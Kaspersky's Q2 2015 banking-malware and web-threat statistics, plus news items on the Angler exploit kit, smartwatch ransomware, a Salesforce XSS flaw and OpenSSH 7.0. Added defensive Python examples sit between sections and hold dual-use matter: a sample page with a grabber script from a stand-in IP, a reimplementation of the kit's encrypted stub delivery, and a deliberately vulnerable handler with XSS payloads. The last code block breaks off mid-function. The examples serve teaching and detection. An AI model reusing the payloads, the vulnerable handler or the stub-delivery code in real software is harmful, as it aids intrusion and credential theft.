A total of 5,903,377 notifications of malicious activity by programs designed to steal money via online access to bank accounts were registered by Kaspersky Lab security solutions in Q2 2015.
IT threat evolution Q2 2015
Number of attacks by financial malware, Q2 2015
Geography of attacks
In the second quarter of 2015, we changed the methodology used to rank the countries affected by the malicious activity of banking Trojans. In our previous reports, the Top 10 was built from the number of users attacked. Although this figure is very important, it depends on the number of Kaspersky Lab product users in each country.
To evaluate and compare the risk of banking Trojan infection that users face worldwide, we calculate, for each country, the percentage of Kaspersky Lab product users who encountered this threat during the reporting period, out of all users of our products in that country.
Geography of banking malware attacks in Q2 2015 (the percentage of users attacked)
Top 10 countries by the percentage of users attacked
Country* % of users attacked **
1 Singapore 5.28%
2 Switzerland 4.16%
3 Brazil 4.07%
4 Australia 3.95%
5 Hong Kong 3.66%
6 Turkey 3.64%
7 New Zealand 3.28%
8 South Africa 3.13%
9 Lebanon 3.10%
10 UAE 3.04%
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000)
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country
In Q2 2015, Singapore took the lead in the percentage of Kaspersky Lab users attacked by banking Trojans. Notably, most countries in the Top 10 have highly developed technology and banking systems, which attracts cybercriminals.
In Russia, 0.75% of users encountered banking Trojans at least once during the quarter; in the US, 0.89%; in Spain, 2.02%; in the UK, 1.58%; in Italy, 1.57%; in Germany, 1.16%.
The TOP 10 banking malware families
The table below shows the Top 10 malicious programs most commonly used in Q2 of 2015 to attack online banking users, based on the number of users attacked:
Name Number of notifications Number of users attacked
1 Trojan-Downloader.Win32.Upatre 3888061 419940
2 Trojan-Spy.Win32.Zbot 889737 177665
3 Trojan-Banker.Win32.ChePro 264534 68467
4 Backdoor.Win32.Caphaw 72128 25923
5 Trojan-Banker.Win32.Banbra 56755 24964
6 Trojan.Win32.Tinba 175729 22942
7 Trojan-Banker.AndroidOS.Marcher 60819 19782
8 Trojan-Banker.AndroidOS.Faketoken 43848 13446
9 Trojan-Banker.Win32.Banker 23225 9209
10 Trojan-Banker.Win32.Agent 28658 8713
The majority of the Top 10 malicious programs work by injecting arbitrary HTML code into the web page displayed by the browser and intercepting any payment data the user enters into the original or the inserted web forms.
The Top 3 banking malicious programs remain unchanged from the previous quarter. Trojan-Downloader.Win32.Upatre kept its leading position in the ranking. Malicious programs in this family are relatively simple and no larger than 3.5 KB. They usually download a Trojan-Banker belonging to the family known as Dyre/Dyzap/Dyreza. The list of financial institutions attacked by the banker Trojan depends on the configuration file that is downloaded from the command-and-control server.
In Q2 2015, three new banking Trojans entered the ranking: Backdoor.Win32.Caphaw, Trojan-Banker.AndroidOS.Marcher and Trojan-Banker.AndroidOS.Faketoken.
Backdoor.Win32.Caphaw was first detected in 2011. It uses the Man-in-the-Browser technique to steal the online banking credentials of bank customers.
Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher attack Android-based mobile devices. Faketoken works in partnership with computer Trojans and is distributed through social engineering: when a user visits their online banking account, the desktop Trojan modifies the page, asking them to download an Android application that is allegedly required to securely confirm the transaction. In fact the link leads to the Faketoken application.
Once Faketoken is on the user's smartphone, the cybercriminals gain access to the user's banking account via the computer infected with the banking Trojan, and the compromised mobile device lets them intercept the one-time confirmation code (mTAN). The second mobile Trojan, Trojan-Banker.AndroidOS.Marcher, tracks the launch of just two apps after infecting a device: the mobile banking client of one European bank and Google Play. If the user starts Google Play, Marcher displays a fake window requesting credit card data, which then goes to the fraudsters. The same method is used when the user starts the banking application.
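The inject-and-intercept mechanism described above for the Top 10 families, and Faketoken's fake "install this app to confirm" page, can be spotted from the defender's side by comparing the fields a page actually contains with the fields the application is known to render. The following Python is an added example, not Kaspersky's code or any bank's: the expected-field manifest, the trusted script hosts and both HTML samples are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed manifest: the input names the bank's real login form renders.
EXPECTED_FIELDS = {"login": {"username", "password", "csrf_token"}}
# Hosts the bank legitimately loads scripts from (assumed).
TRUSTED_SCRIPT_HOSTS = {"www.bank.example", "static.bank.example"}

# Constructed sample: the login page as the bank serves it.
CLEAN_PAGE = """
<form id="login" action="/auth" method="post">
  <input name="username"><input name="password" type="password">
  <input name="csrf_token" type="hidden" value="abc">
</form>
<script src="https://static.bank.example/app.js"></script>
"""

# Constructed sample: the same page after a Man-in-the-Browser inject added
# fields for the card PIN and the one-time code, plus a grabber script.
INJECTED_PAGE = """
<form id="login" action="/auth" method="post">
  <input name="username"><input name="password" type="password">
  <input name="csrf_token" type="hidden" value="abc">
  <label>ATM PIN</label><input name="atm_pin">
  <label>SMS confirmation code</label><input name="mtan">
</form>
<script src="https://static.bank.example/app.js"></script>
<script src="http://198.51.100.7/grab.js"></script>
"""


class FormInspector(HTMLParser):
    """Collect input names per form and the sources of external scripts."""

    def __init__(self):
        super().__init__()
        self.current_form = None
        self.fields = {}      # form id -> set of input names
        self.scripts = []     # src attributes of <script> tags

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current_form = a.get("id", "<anonymous>")
            self.fields.setdefault(self.current_form, set())
        elif tag == "input" and self.current_form is not None and a.get("name"):
            self.fields[self.current_form].add(a["name"])
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self.current_form = None


def find_injections(html, expected=EXPECTED_FIELDS, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return human-readable findings for fields or scripts the page should not contain."""
    insp = FormInspector()
    insp.feed(html)
    insp.close()
    findings = []
    for form_id, names in insp.fields.items():
        for name in sorted(names - expected.get(form_id, set())):
            findings.append(f"unexpected field '{name}' in form '{form_id}'")
    for src in insp.scripts:
        host = urlsplit(src).hostname
        if host not in trusted_hosts:
            findings.append(f"script loaded from untrusted host {host!r}")
    return findings


def unexpected_post_params(form_id, posted, expected=EXPECTED_FIELDS):
    """Server-side variant: parameter names in a POST that the form never renders.
    The infected browser cannot tamper with a check the server evaluates."""
    return sorted(set(posted) - expected.get(form_id, set()))


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, find_injections(page) or "no findings")
    print(unexpected_post_params("login", {"username": "u", "password": "p",
                                           "csrf_token": "abc", "atm_pin": "1234"}))
```

Two caveats a practitioner would add. A check that runs inside the victim's own browser can be neutralised by the same Trojan that modified the page, so the HTML comparison belongs in a proxy or a telemetry post-back rather than in page JavaScript. The POST-parameter variant is the more robust of the two because the server evaluates it, but it only fires if the grabber lets the injected fields reach the legitimate endpoint; fields it strips before submission show up only in the page-side check.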
Financial threats
Financial threats are not limited to banker malware that attacks online banking customers.
Financial malware: distribution by malware type
In Q2 2015, the proportion of banking malware increased from 71% to 83% compared with the previous quarter. The second most widespread financial threat was Bitcoin miners – malicious software that uses computing resources of the victim’s computer to generate bitcoins. In the previous quarter, this category of malware was in third place. Of note is the fact that some legitimate software developers secretly integrate Bitcoin-miners in their applications.
Top 20 malicious objects detected online
In the second quarter of 2015, Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
We identified the 20 most active malicious objects involved in online attacks against users’ computers. These 20 accounted for 96.5% of all attacks on the Internet.
Top 20 malicious objects detected online
Name* % of all attacks**
1 AdWare.JS.Agent.bg 47.66%
2 Malicious URL 32.11%
3 Trojan.Script.Generic 4.34%
4 AdWare.Script.Generic 4.12%
5 Trojan.Script.Iframer 3.99%
6 AdWare.JS.Agent.bt 0.74%
7 Exploit.Script.Blocker 0.56%
8 Trojan.Win32.Generic 0.49%
9 AdWare.AndroidOS.Xynyin.a 0.49%
10 Trojan-Downloader.Win32.Generic 0.37%
11 Trojan-Ransom.JS.Blocker.a 0.34%
12 Trojan-Clicker.JS.Agent.pq 0.23%
13 AdWare.JS.Agent.an 0.20%
14 AdWare.JS.Agent.by 0.19%
15 Trojan.Win32.Invader 0.12%
16 Trojan-Downloader.Win32.Genome.qhcr 0.11%
17 AdWare.Win32.Amonetize.ague 0.11%
18 AdWare.Win32.MultiPlug.nnnn 0.10%
19 AdWare.NSIS.Agent.cv 0.09%
20 Trojan-Downloader.Script.Generic 0.09%
* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.
The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs.
Aggressive distribution of advertising programs affected the ranking: 10 of the 20 positions are occupied by advert-related objects. First place went to AdWare.JS.Agent.bg, a script that is injected into arbitrary web pages to insert adware; it even pushed Malicious URL, the verdict we use for links from the blacklist, down to second place in Q2 2015.
Of interest is the appearance of the AdWare.AndroidOS.Xynyin.a verdict: it is unusual to see a verdict for Android malware in the rankings for malware on users' computers. The program behind this verdict is an advertising module for Android embedded in various applications (for example, in programs that "accelerate" the phone). One such application was popular in March and April of this year, when it was actively downloaded by users. Since Google Play does not carry such applications, they were downloaded from the Internet, mostly via the victims' computers, which is how the verdict ends up in the desktop web antivirus statistics.
The Trojan-Ransom.JS.Blocker.a verdict is a script that tries to lock the browser by reloading the page periodically and displays a message demanding that the victim pay a "fine" to the specified e-wallet for viewing inappropriate material. The script is mostly encountered on porn sites.
Top 10 countries where online resources are seeded with malware
The following stats are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.
In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.
In Q2 2015, Kaspersky Lab solutions blocked 379,972,834 attacks launched from web resources located in various countries around the world. 89% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.
Distribution of web attack sources by country, Q2 2015
Russia (51%) kept its lead; its share grew by 11.27 percentage points. Switzerland left the Top 10. Singapore came eighth in the ranking with 1.56% of all web attacks.
Countries where users faced the greatest risk of online infection
In order to assess the risk of online infection faced by users in different countries, we calculate the percentage of Kaspersky Lab users in each country who encounter detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.
Country* % unique users attacked**
1 Russia 38.98%
2 Kazakhstan 37.70%
3 Ukraine 35.75%
4 Syria 34.36%
5 Belarus 33.02%
6 Azerbaijan 32.16%
7 Thailand 31.56%
8 Georgia 31.44%
9 Moldova 31.09%
10 Vietnam 30.83%
11 Armenia 30.19%
12 Kyrgyzstan 29.32%
13 Croatia 29.16%
14 Algeria 28.85%
15 Qatar 28.47%
16 China 27.70%
17 Mongolia 27.27%
18 Macedonia 26.67%
19 Bosnia and Herzegovina 25.86%
20 Greece 25.78%
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.
In Q2 2015, Russia, which was second in the first quarter, regained its top position in the ranking. Since the previous quarter, UAE, Latvia, Tajikistan, Tunisia and Bulgaria have left the Top 20. The newcomers to the rankings were Syria, which rocketed to fourth place (34.36%); Thailand, which was in seventh place (31.56%); Vietnam, in tenth place (30.83%); China (27.70%) and Macedonia (26.67%), which occupied 16th and 18th places respectively.
The countries with the safest online surfing environments included Argentina (13.2%), the Netherlands (12.5%), Korea (12.4%), Sweden (11.8%), Paraguay (10.2%) and Denmark (10.1%).
On average, 23.9% of computers connected to the Internet globally were subjected to at least one web attack during the three months.
Local threats
Local infection statistics for users' computers are a very important indicator: they reflect threats that have penetrated computer systems by means other than the Internet, email, or network ports.
Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.
In Q2 2015, Kaspersky Lab’s file antivirus modules detected 110,731,713 unique malicious and potentially unwanted objects.
Top 20 malicious objects detected on users' computers
Name* % unique users attacked**
1 DangerousObject.Multi.Generic 22.64%
2 Trojan.Win32.Generic 15.05%
3 Trojan.WinLNK.StartPage.gena 8.28%
4 AdWare.Script.Generic 7.41%
5 Adware.NSIS.ConvertAd.heur 5.57%
6 WebToolbar.Win32.Agent.azm 4.48%
7 WebToolbar.JS.Condonit.a 4.42%
8 Trojan-Downloader.Win32.Generic 3.65%
9 Downloader.Win32.MediaGet.elo 3.39%
10 Trojan.Win32.AutoRun.gen 3.29%
11 Downloader.Win32.Agent.bxib 3.26%
12 WebToolbar.JS.CroRi.b 3.09%
13 RiskTool.Win32.BackupMyPC.a 3.07%
14 Virus.Win32.Sality.gen 2.86%
15 Worm.VBS.Dinihou.r 2.84%
16 WebToolbar.Win32.MyWebSearch.si 2.83%
17 DangerousPattern.Multi.Generic 2.75%
18 AdWare.NSIS.Zaitu.heur 2.70%
19 AdWare.BAT.Clicker.af 2.67%
20 AdWare.Win32.MultiPlug.heur 2.54%
* These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
** The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.
In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components (such as AdWare.BAT.Clicker.af), and to worms distributed on removable drives.
The only virus in the rankings, Virus.Win32.Sality.gen, continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q2 2015, Sality was in 14th place with 2.86%, 0.32 percentage points lower than in the previous quarter.
Countries where users faced the highest risk of local infection
For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.
Top 20 countries with the highest levels of computer infection
Country* % unique users**
1 Bangladesh 60.53%
2 Vietnam 59.77%
3 Pakistan 58.79%
4 Mongolia 58.59%
5 Georgia 57.86%
6 Somalia 57.22%
7 Nepal 55.90%
8 Afghanistan 55.62%
9 Algeria 55.44%
10 Armenia 55.39%
11 Russia 54.94%
12 Laos 54.77%
13 Iraq 54.64%
14 Kazakhstan 54.23%
15 Syria 53.00%
16 Tunisia 53.75%
17 Ethiopia 53.44%
18 Rwanda 53.17%
19 Ukraine 53.01%
20 Cambodia 52.88%
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.
In Q2 2015, Bangladesh (60.53%) took the lead as the country with the highest level of computer infection, pushing down Vietnam which has headed the rating for almost two years. Pakistan (58.79%) rocketed from 13th position in the previous quarter to 3rd place in Q2.
The newcomers in the rankings were Georgia (5th position with 57.8%), Russia (11th position with 55%), Tunisia (16th position with 53.7%) and Ukraine (19th position with 53%).
The safest countries in terms of local infection risks were Sweden (19.7%), Denmark (18.4%) and Japan (15.5%).
An average of 40% of computers globally faced at least one local threat during Q2 2015, 0.2 percentage points more than in Q1 2015.
Angler EK exploits recently patched IE bug to deliver ransomware
14.8.2015
If they haven't already, Internet Explorer users would do well to install the security update Microsoft provided last month, as among the vulnerabilities it fixes is one that is currently being exploited via the popular commercial Angler exploit kit.
The existence of the vulnerability in question (CVE-2015-2419) came to light when the attackers who breached Hacking Team leaked the stolen data.
An email in the leaked trove showed that an external researcher attempted to sell a proof-of-concept exploit for the bug to the company. Details in the email allowed Vectra researchers to find the bug and analyze it.
FireEye researchers were the ones who have sounded the alarm about the exploit being added to Angler, along with a new obfuscation technique for it.
"The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. The stub of information is only sent to victims that broadcast vulnerable browsers, and is protected with XTEA over a homebrew Diffie-Hellman," they explained.
At the moment, the Angler exploit kit is using the IE exploit to deliver Cryptowall ransomware to unsuspecting victims. It can do so because the vulnerability lets the attacker execute code with the same rights as the current user.
"If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft explained.
The FireEye researchers' findings have been confirmed by malware researcher Kafeine.
"The exploitation of CVE-2015-2419 marks the second departure from Flash exploits for Angler (the first being the inclusion of CVE-2015-1671 in Silverlight)," the researchers commented. "This may be the result of Adobe’s recent exploit mitigations in Flash Player that prevent attackers from using Vector (and similar) objects to develop their control over corrupted Flash processes."
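FireEye's description, a per-victim key agreement with the stub encrypted under XTEA, is easier to reason about with both sides written out. The following Python is an added example and not Angler's code: the group parameters, the key derivation and the message format are all assumptions, since the text says only that XTEA was used over a homebrew Diffie-Hellman exchange. The group is deliberately tiny so that the last function can show what "homebrew" costs: with a small modulus, an analyst holding nothing but the captured exchange can brute-force the browser's exponent and read the stub without ever having been the victim browser.

```python
import hashlib
import json
import secrets
import struct

MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9
CYCLES = 32  # standard XTEA: 32 cycles, i.e. 64 Feistel rounds


def xtea_encrypt_block(block, key):
    # Masking once per assignment equals 32-bit truncation at every step,
    # because +, ^ and << all commute with reduction mod 2**32.
    v0, v1 = struct.unpack(">2I", block)
    k = struct.unpack(">4I", key)
    s = 0
    for _ in range(CYCLES):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
    return struct.pack(">2I", v0, v1)


def xtea_decrypt_block(block, key):
    v0, v1 = struct.unpack(">2I", block)
    k = struct.unpack(">4I", key)
    s = (DELTA * CYCLES) & MASK
    for _ in range(CYCLES):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
    return struct.pack(">2I", v0, v1)


def _pad(data):
    n = 8 - len(data) % 8
    return data + bytes([n]) * n


def _unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= 8 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def xtea_cbc_encrypt(plaintext, key, iv):
    padded, prev, out = _pad(plaintext), iv, []
    for i in range(0, len(padded), 8):
        prev = xtea_encrypt_block(bytes(a ^ b for a, b in zip(padded[i:i + 8], prev)), key)
        out.append(prev)
    return iv + b"".join(out)


def xtea_cbc_decrypt(ciphertext, key):
    prev, out = ciphertext[:8], []
    for i in range(8, len(ciphertext), 8):
        block = ciphertext[i:i + 8]
        out.append(bytes(a ^ b for a, b in zip(xtea_decrypt_block(block, key), prev)))
        prev = block
    return _unpad(b"".join(out))


# Toy group (an assumption, not Angler's parameters): 3 is a primitive root
# mod the prime 65537, so each public value has one exponent in [1, 65535].
P, G = 65537, 3


def dh_keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def derive_key(shared):
    # KDF is an assumption: SHA-256 of the shared secret, cut to XTEA's 128-bit key.
    return hashlib.sha256(shared.to_bytes(4, "big")).digest()[:16]


def serve_stub(browser_pub, stub):
    """Kit server: answer the landing page's request with (server_pub, ciphertext)."""
    priv, pub = dh_keypair()
    key = derive_key(pow(browser_pub, priv, P))
    return pub, xtea_cbc_encrypt(json.dumps(stub).encode(), key, secrets.token_bytes(8))


def fetch_stub(stub):
    """Landing page: run the exchange, decrypt the stub, and also return what a
    passive observer on the wire would have seen."""
    priv, pub = dh_keypair()
    server_pub, ct = serve_stub(pub, stub)
    plaintext = xtea_cbc_decrypt(ct, derive_key(pow(server_pub, priv, P)))
    return json.loads(plaintext), (pub, server_pub, ct)


def brute_force_dlog(pub):
    """Solve G**x == pub (mod P) by enumeration; instant for this toy group."""
    acc = 1
    for x in range(P - 1):
        if acc == pub:
            return x
        acc = (acc * G) % P
    return None


def recover_stub_from_capture(browser_pub, server_pub, ct):
    """Analyst with only the captured exchange: no browser-side secret is needed
    once the group is small enough to brute-force."""
    browser_priv = brute_force_dlog(browser_pub)
    return json.loads(xtea_cbc_decrypt(ct, derive_key(pow(server_pub, browser_priv, P))))


if __name__ == "__main__":
    sample = {"key": "0123456789abcdef", "data": "constructed-sample"}  # constructed stub
    received, captured = fetch_stub(sample)
    print("browser decrypted:", received)
    print("analyst recovered:", recover_stub_from_capture(*captured))
```

The scheme's resistance to offline analysis therefore rests on the size of the group, not on the XTEA layer, so the first thing to check in a capture is how large the modulus actually is. Since the server only answers browsers that announce a vulnerable version, fresh requests from an analysis box typically return nothing, which is why the captured exchange, not a replay, is what an analyst usually has to work with.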
Ransomware Attacks Threaten Wearable Devices and Internet of Things
14.8.2015
Are you a proud owner of a Smartwatch, a Smart TV, a Smart fridge, a Smart lock, an Internet-enabled car, or live in a smart city?
Caution!
It has recently been reported that the growth of the Internet of Things will eventually become a money-maker for cybercriminals as they start holding IoT devices for ransom. Yes, the cybercriminals' latest interest in the Internet of Things is ransomware.
Internet of Things (IoT) devices such as Android- and iOS-based smartwatches, and the connected home in general, have given the current generation of ransomware a new target. As technology advances, cybercriminals are moving beyond the familiar threat that locks computers or encrypts files and demands money from users to regain access to their systems.
Having moved from computers to mobile phones, criminals are now targeting IoT and wearable devices. Security researchers at Symantec demonstrated how an Android Wear device might be affected by typical Android ransomware. To conduct the test, the researchers simply repackaged a current Android ransomware app (.apk file), detected as Android.Simplocker, inside a new Android Wear project.
Next, they took a Moto 360 smartwatch and paired it with an Android phone. When they installed the new .apk file on the phone, the phone became infected with the ransomware.
Because the smartwatch and the Android phone are paired over Bluetooth, the ransomware was also pushed onto the smartwatch once the two devices were paired.
Once on the smartwatch, the malware is activated if the user is tricked into running it by tapping the malicious app.
Once running, the ransomware renders the smartwatch unresponsive and unusable.
Simplocker then checks every second whether its ransom message is displayed and, if not, pushes it back onto the screen. In addition, Simplocker encrypts a range of files stored on the smartwatch's SD card.
So how do you get out of this situation? Recovery is possible, but unfortunately it involves a factory reset of the smartwatch. If the device can be rebooted with its hardware buttons, the user has to navigate quickly to the factory reset setting (within 20-30 seconds) before the ransomware starts again.
According to Symantec, while this erases all files on the smartwatch, those files had already been encrypted by the malware anyway, which is why an up-to-date backup is needed.
No such ransomware has been seen in the wild yet, but the day is not far off when it becomes a reality.
In the past it has already been shown that smart televisions can be hit by ransomware and that IoT devices can be remotely controlled by an attacker.
The crux is that users need to be more vigilant, and smarter than the technology they depend on.
Salesforce Patches XSS on a Subdomain
14.8.2015
Salesforce.com has patched a vulnerability on one of its subdomains that exposed users to account takeover, phishing attacks and the installation of malicious code. The vulnerability was disclosed yesterday by researcher Aditya K. Sood of Elastica Cloud Threat Labs. Sood said admin.salesforce.com was vulnerable to a cross-site scripting attack; it has since been patched, more than a month after it was reported. Salesforce, Sood wrote in a blog post, said the vulnerability posed less of a risk because it was present in a Salesforce subdomain.
“The vulnerability was not present in ‘login.salesforce.com,’ but in another subdomain of Salesforce. However, since the primary domain is ‘salesforce.com,’ this trust can be exploited through phishing attacks by tricking users into providing their legitimate credentials,” Sood said.
Sood said that Salesforce accounts use SSO for authentication across its applications, extending the threat to accounts used with cloud-based applications.
“This subdomain was vulnerable to a reflected cross-site scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request,” Sood said. “As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.”
To carry out a phishing attack, an attacker would need to create a popup mimicking the Salesforce login and inject the JavaScript remotely. The victim would then enter their legitimate Salesforce credentials, which are sent to the attacker's web server.
Cross-site scripting (XSS) happens when malicious script is injected into a website or web application; it is a perennial web application security issue on the OWASP Top 10 list. Typically the attacker places the script in a GET request parameter that the application then reflects into dynamic content, and XSS is usually possible because the web app fails to validate its input and encode its output.
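Sood's description, a function that reflects an HTTP request parameter without sanitising it, maps onto a handful of lines. The following Python is an added example, not Salesforce's code: the handler, parameter name, hostname and payloads are constructed, and the middle variant exists to show the mistake that often survives a first fix, encoding for the wrong context.

```python
from html import escape
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed payloads. The first carries a script tag; the second contains no
# angle brackets at all and works only by terminating a quoted attribute early.
PAYLOAD_TAG = '<script>alert(1)</script>'
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'


def _query_param(request_url, name="q"):
    return parse_qs(urlsplit(request_url).query).get(name, [""])[0]


def render_search_vulnerable(request_url):
    """Reflects the parameter into text and attribute context without any
    output encoding: the failure Sood describes."""
    q = _query_param(request_url)
    return f'<h1>Results for {q}</h1>\n<input name="q" value="{q}">'


def render_search_half_fixed(request_url):
    """Escapes <, > and & but not quotes. Sufficient for the text context,
    insufficient for the attribute: a bracket-free payload still breaks out."""
    q = escape(_query_param(request_url), quote=False)
    return f'<h1>Results for {q}</h1>\n<input name="q" value="{q}">'


def render_search_fixed(request_url):
    """Context-appropriate output encoding: quotes are escaped too, so the
    attribute value cannot be terminated by the input."""
    q = _query_param(request_url)
    return (f'<h1>Results for {escape(q)}</h1>\n'
            f'<input name="q" value="{escape(q, quote=True)}">')


# Defence in depth for the response (assumed values): a policy without
# 'unsafe-inline' keeps an injected inline script or handler from executing
# even if an encoding mistake slips through elsewhere in the application.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    "X-Content-Type-Options": "nosniff",
}


def executes_payload(html):
    """Oracle for the demonstration: a live script tag or event handler present?"""
    return "<script>" in html or ' onfocus="alert(1)' in html


def make_url(payload):
    return "https://admin.example/search?" + urlencode({"q": payload})


if __name__ == "__main__":
    for name, render in (("vulnerable", render_search_vulnerable),
                         ("half-fixed", render_search_half_fixed),
                         ("fixed", render_search_fixed)):
        for payload in (PAYLOAD_TAG, PAYLOAD_ATTR):
            print(f"{name:11} {payload!r:40} executes={executes_payload(render(make_url(payload)))}")
```

Encode for the context the value lands in (text, quoted attribute, URL, JavaScript) rather than trying to "sanitise" the input, and treat the CSP as a second layer rather than a replacement. The SSO point Sood raises is why a subdomain matters: a script running on admin.salesforce.com runs under a name the user trusts and can read any cookie scoped to the parent domain.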
OpenSSH 7.0 Fixes Four Flaws
13.8.2015
A new version of OpenSSH has been released, fixing four security vulnerabilities and a number of non-security bugs. Two of the four, including a use-after-free, affect only Portable OpenSSH. The maintainers also gave users notice that the next version will deprecate several old ciphersuites and cryptographic algorithms that are no longer considered safe.
One of the vulnerabilities patched in version 7.0 is an issue with the way OpenSSH handles some authentication requests. “By specifying a long, repeating keyboard-interactive “devices” string, an attacker could request the same authentication method be tried thousands of times in a single pass. The LoginGraceTime timeout in sshd(8) and any authentication failure delays implemented by the authentication mechanism itself were still applied,” the release notes say.
One of the bugs that affects only Portable OpenSSH is a use-after-free that could lead to remote code execution. “Fixed a use-after-free bug related to PAM support that was reachable by attackers who could compromise the pre-authentication process for remote code execution,” the advisory says. The second Portable OpenSSH fix closes a privilege separation weakness that matters to an attacker who has already achieved code execution in the pre-authentication process. “Fixed a privilege separation weakness related to PAM support. Attackers who could successfully compromise the pre-authentication process for remote code execution and who had valid credentials on the host could impersonate other users,” the advisory says.
In OpenSSH 7.1, the maintainers plan to remove a number of problematic cryptographic algorithms and ciphers. Among the planned changes:
* Refusing all RSA keys smaller than 1024 bits (the current minimum is 768 bits)
* Several ciphers will be disabled by default: blowfish-cbc, cast128-cbc, all arcfour variants and the rijndael-cbc aliases for AES.
* MD5-based HMAC algorithms will be disabled by default.
The just-released version 7.0 contains a number of cryptographic changes as well: it disables the 1024-bit diffie-hellman-group1-sha1 key exchange by default and drops support for the old SSH version 1 protocol.
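The release-note items above translate directly into a configuration audit. The following Python is an added example, not OpenSSH's code: it flags the ciphers, MACs and key exchange the notes name and measures RSA keys against the coming 1024-bit floor. The sshd_config sample is constructed, and the key lines exercised in the test are synthetic wire-format data built by a helper, not real keys.

```python
import base64
import re
import struct

# Algorithms the 7.0 release disables or the planned 7.1 release retires, per the notes.
RETIRED_CIPHERS = {"blowfish-cbc", "cast128-cbc", "arcfour", "arcfour128", "arcfour256",
                   "rijndael-cbc@lysator.liu.se"}
RETIRED_KEX = {"diffie-hellman-group1-sha1"}
MD5_MAC = re.compile(r"hmac-md5", re.I)
MIN_RSA_BITS = 1024

# Constructed sshd_config exercising every retired setting.
SAMPLE_SSHD_CONFIG = """\
# constructed sample, not a real host
Port 22
Protocol 2,1
Ciphers aes128-ctr,arcfour256,blowfish-cbc
MACs hmac-sha2-256,hmac-md5,hmac-md5-96-etm@openssh.com
KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group1-sha1
HostKey /etc/ssh/ssh_host_rsa_key
"""

_KV = re.compile(r"^(\S+?)[ \t=]+(.*?)\s*$")


def parse_sshd_config(text):
    """First occurrence of each keyword wins, as in sshd(8); keywords are case-insensitive."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = _KV.match(line)
        if m:
            conf.setdefault(m.group(1).lower(), m.group(2))
    return conf


def audit_sshd_config(text):
    """Return one finding per retired algorithm or protocol the config still allows."""
    conf = parse_sshd_config(text)
    findings = []
    if "1" in [p.strip() for p in conf.get("protocol", "2").split(",")]:
        findings.append("Protocol: SSH version 1 enabled; support is being removed")
    for c in map(str.strip, conf.get("ciphers", "").split(",")):
        if c in RETIRED_CIPHERS:
            findings.append(f"Ciphers: {c} is disabled by default from 7.1")
    for m in map(str.strip, conf.get("macs", "").split(",")):
        if MD5_MAC.search(m):
            findings.append(f"MACs: {m} is MD5-based and disabled by default from 7.1")
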